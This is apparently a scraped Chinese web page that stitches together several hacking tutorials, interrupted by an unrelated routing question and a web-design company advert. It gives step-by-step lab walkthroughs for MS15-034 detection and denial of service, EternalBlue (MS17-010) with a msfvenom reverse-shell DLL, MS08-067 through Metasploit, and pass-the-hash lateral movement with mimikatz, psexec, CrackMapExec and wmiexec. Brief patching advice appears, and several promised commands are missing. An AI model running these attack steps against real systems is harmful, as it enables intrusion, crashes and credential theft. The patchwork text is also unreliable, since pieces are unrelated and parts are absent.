MS15-034复现

漏洞主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。IIS6.0以上。

创新互联公司成立于2013年，先为嘉鱼等服务建站，嘉鱼等地企业，进行企业商务咨询服务。为嘉鱼企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

靶机：win7  iis7

win7安装好iis服务后访问80端口，检测是否存在漏洞：使用curl发送以下数据

curl -H "Host: 192.168.137.129" -H "Range: bytes=0-18446744073709551615"

当出现Requested Range Not Satisfiable时说明存在漏洞。

使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模块可直接造成服务器蓝屏，

使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块检测时仅针对：windoiws 8.1, 2012, or 2012R2有效。

WIN7系统有2块网卡 如何分别指定其中一个网卡绑定ARP信息

是需要添加静态路由？

分别指定2块不同的网卡走不同的路由就可以了吧？

类似于：

route add 172.26.34.0 mask 255.255.255.0 172.26.34.1

route add 203.92.218.0 mask 255.255.255.0 172.26.32.1

ms17-010：利用“永恒之蓝”攻陷一台计算机

我估摸着这两天大家都应该被一款老旧的勒索病毒刷爆了朋友圈，可能还有些同学不幸中招，那么是什么原因导致了这款勒索病毒如此猖狂？

这件事情还得从一个黑客组织说起，这个组织叫做Equation Group（方程式组织），这一黑客团伙与美国国家安全局（NSA）的关系一直十分密切。而且外界也普遍认为，Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示，Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看，都已经超越了目前绝大多数的黑客团体，而且该黑客组织已经活跃了二十多年了。

然而，这个黑客组织被另一黑客团伙“The Shadow Brokers”（影子经纪人）给入侵了……(就是这么任性)。“The Shadow Brokers”（影子经纪人）自称他们从Equation Group手里拿到了很大一部分黑客工具，决定公开叫卖。

本以为能狠赚一笔，但实际上却没有人鸟他们，就是这么神奇。于是The Shadow Brokers决定公开一部分有价值的工具，其中“eternalblue”（永恒之蓝）就是其中之一（漏洞编号ms17-010）。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢？这么说吧，除了windows 10以外，windows系列的系统无一能够幸免。

于是乎，永恒之蓝漏洞利用程序+wannacry勒索软件程序造就了迄今为止最巨大的勒索交费活动，影响到近百个国家上千家企业及公共组织。

接下来，满足小白的好奇心，一起探究The Shadow Brokers公布的永恒之蓝漏洞利用程序，如何利用ms17-010攻陷一台64位windows 7。

攻击机1(192.168.1.101)：

装有metasploit的linux

攻击机2(192.168.1.137)：

可以运行The Shadow Brokers工具箱的windows xp-python2.6+ PyWin32 v2.12

靶机(192.168.1.140)：

windows 7 x64（开放139、445端口）

利用The Shadow Brokers工具箱中的永恒之蓝利用程序攻陷靶机

修改后的路径与目录当前的路径一致

一路回车，直到输入项目名称处，输入项目名称

继续回车

继续一路回车，直到选择模式选择1

继续一路回车，直至攻击完成

相关命令：

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

一路回车，直到选择系统架构，由于我们要攻击的主机是win 7 x64位，故这里选择1

选择2 dll注入

Ps：喜欢的留个赞b(￣▽￣)d ~也可以关注专题：黑客师。

ms08-067 复现，使用metasploit

时间：2022-03-10

一、环境准备

1、需要准备英文的windows xp 环境。

链接：

提取码：y8mj

2、攻击工具使用的是metasploit，kali 自带。

二、复现时存在的问题

1、安装完xp之后，我自己已经复现了一次，发现拿到的system没有相关命令，可能是这个新系统没有添加到环境中，之后建立了一个文档进行读取，也可直观的看到结果。其他就没遇到什么问题了。

三、复现演示

1、虚拟机准备一下xp，建立一个test的文档，查看一下靶机 IP，靶机建立完成

2、使用metasploit 进行攻击

1）、msfconsole #进入metasploit

2）、search ms08-067 #搜索相关exp

3）、use exploit/windows/smb/ms08_067_netapi #使用这个exp

4）、show payloads #搜索相关payload，能让攻击后建立连接

5）、set payload generic/shell_bind_tcp #我使用的是这个

6）、set RHOST 192.168.154.144 #设置靶机IP，让它攻击这个IP，端口默认是445，这个就不需要设置了

7）、show options #可以用这个命令查看是否把相关配置设置全了

8）、run 或 exploit #进行攻击，两个命令都可以

9）、type test.txt #之后攻击成功了，使用windows命令 就可以去相关路径下查看那个 test 文档了

演示图：

ms17010漏洞的简单利用

（第一次在发表文章，没啥经验，分享一些学习经验。大佬们多多包涵，也希望大家能够指出我的错误。）

靶机：windows7 x64  IP：192.168.1.5

攻击机：Kali Rolling (2019.3) x64 IP：192.168.1.3

两台主机在同一网段内；win7关闭防火墙并且开启445端口。

1、使用ipconfig/ifconfig分别查看win7和kali的ip。

2、打开msf工具

每次开启都会有不同的界面

3、使用search命令搜索ms17_010

4、选择模块和设置条件

使用use来选择第三个模块，可以直接 use 2，也可以打全

然后用set来设置靶机IP set rhost 192.168.1.5

设置本机IP set lhost 192.168.1.3

设置监听端口 set lport 8888 不设置则默认4444端口

设置payload set payload windows/x64/meterpreter/reverse_tcp

还有另外一个payload能用于本实验，具体可以 show payloads 查看

最后，可以使用show options检查所有信息

5、开始渗透 run

稍等片刻 看到win则成功创建会话

6、成功之后，可以开启Windows7的摄像头，截图等等

具体可以用help查看

1、关闭445端口

2、打开防火墙，安装安全软件

3、安装对应补丁，这里就不放链接了

关闭445端口的方法：

1）打开控制面板----Windows防火墙----高级设置

2）点击新建规则，设置端口号的规则并且命名（如图）

msf工具虽然强大，但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。

横向渗透之Pass The Hash

在上一章总结了windows抓取hash的一些方式。在实际场景中，我们需要更快的扩大战果，获取更多控制权限，以及定位域环境。

横向渗透：就是在得到一台主机的控制权限后，将该主机作为突破口、跳板，利用既有的资源尝试获取更多的凭据、更高的权限，进而达到控制整个内网、拥有最高权限。

Pass The Hash 哈希传递简称PTH，可以在不需要明文密码的情况下，利用LM HASH和NTLM HASH直接远程登录。攻击者不需要花费时间来对hash进行爆破，在内网渗透里非常经典。

常常适用于域/工作组环境。

靶机：windows server 2008

IP：10.211.55.19

domain：workgroup

user：administrator

pass：cseroad@2008

NTLM-Hash：82c58d8cec50de01fd109613369c158e

psexec类工具大同小异，大部分工具都是通过psexec来执行的。原理是： 通过ipc$连接，将psexesvc.exe释放到目标机器，再通过服务管理SCManager远程创建psexecsvc服务，并启动服务。然后通过psexec服务运行命令，运行结束后删除该服务。

如：Metasploit psexec，Impacket psexec，pth-winexe，Empire Invoke-Psexec

缺点：容易被杀软检测到

优点：可以直接获取system权限

因为市面工具比较多，只kali就自带有很多。所以这里以好用、批量为准则选择了几款工具。

mimikatz中pth功能的原理：

windows会在lsass中缓存hash值，并使用它们来ntlm认证，我们在lsass中添加包含目标账号hash的合法数据结构，就可以使用类似dir这些命令进行认证。

正常访问server 2008 的盘符是需要用户名密码的。

在windows7上经过pth之后就不需要密码就可以远程连接。

将获取的hash添加进lsass中。

在windows 7 上执行以下命令：

执行后会弹出cmd。在cmd下执行 net use \\10.211.55.19\c$ 命令就可以远程连接。

扩展：

假如我们继续探测到10.211.55.8使用的是同一个hash值。我们尝试使用远程共享c盘和schtasks 定时计划任务执行获取一个session。

powershell.bat为

当重启10.211.55.8机器后，metasploit可得到session

笔者经常使用时的是这三个模块

以exploit/windows/smb/psexec模块为例

值得一说的是smbpass配置项支持明文密码也支持hash(LM-Hash:NTLM-Hash)

成功返回system权限。

CobalStrike 同样有psexec选项。

在得到一个beacon的基础上，先在该网段portscan，探测存活主机后。

选择View--Target--Login--psexec，可批量选择主机pth。

选择pth的用户名和hash值。

从执行的命令看得出依然利用的mimikatz。执行成功后返回system权限。

该工具可以对C段主机批量pth。

项目在 github

在kali上直接apt就可以安装

对工作组批量pth命令如下

测试的时候发现某些命令执行后没有回显。

更多资料参考：

CrackMapExec：域环境渗透中的瑞士军刀

红队测试工具-CrackMapExec-远程执行Windows命令

wmi内置在windows操作系统，用于管理本地或远程的 Windows 系统。wmiexec是对windows自带的wmic做了一些强化。攻击者使用wmiexec来进行攻击时，不会记录日志，不会写入到磁盘，具有极高的隐蔽性。

安装成功后，切换到examples目录下

运行命令为

先加载Invoke-WMIExec.ps1脚本，再加载Invoke-TheHash.ps1脚本，因为Invoke-TheHash 里要用到 Invoke-WMIExec方法

如果要执行系统命令。可以加-Command 参数

执行后该进程会在后台运行，可以结合定时任务执行尝试反弹shell。

在测试中发现，在打了kb2871997 这个补丁后，常规的Pass The Hash已经无法成功，但默认的Administrator(SID 500)账号例外，利用这个账号仍可以进行Pass The Hash远程ipc连接。

以上所有操作均针对的SID 500。

内网渗透之PTHPTTPTK

横向移动

丢掉PSEXEC来横向渗透

标题名称：关于windows7靶机系统的信息
文章转载：http://myzitong.com/article/hggjsg.html